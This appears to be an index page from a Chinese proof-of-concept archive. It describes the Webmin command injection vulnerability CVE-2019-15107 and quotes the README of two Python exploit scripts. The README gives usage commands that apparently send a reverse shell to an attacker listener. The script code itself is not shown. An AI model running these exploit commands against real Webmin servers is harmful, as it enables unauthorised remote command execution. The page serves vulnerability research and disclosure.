关联漏洞
标题:
Webmin 命令操作系统命令注入漏洞
(CVE-2019-15107)
描述:Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令操作系统命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。
描述
Exploit for Webmin servers versions 1.890 through 1.920.
介绍
# Webmin CVE-2019-15107
Exploits a backdoor in Webmin servers versions 1.890 through 1.920.
Version 1.890 can be exploited on the default installation.
Versions 1.900, 1.910 and 1.920 require the expired password change feature to be enabled.
|File |Version |
|--------------------|----------------------|
|cve201915107.py |1.900, 1.910 and 1.920|
|cve201915107_1890.py|1.890 |
**Usage:**
```
python cve201915107.py 'target_ip' 'target_port' 'lhost' 'lport'
```
or
```
python cve201915107_1890.py 'target_ip' 'target_port' 'lhost' 'lport'
```
**Example:**
```
python cve201915107.py 192.168.1.202 10000 192.168.1.100 4444
```
or
```
python cve201915107_1890.py 192.168.1.202 10000 192.168.1.100 4444
```
文件快照
[4.0K] /data/pocs/63d62b25a42be9a3f17390874fe3547dd37044f1
├── [3.4K] cve201915107_1890.py
├── [3.3K] cve201915107.py
├── [ 34K] LICENSE
└── [ 768] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。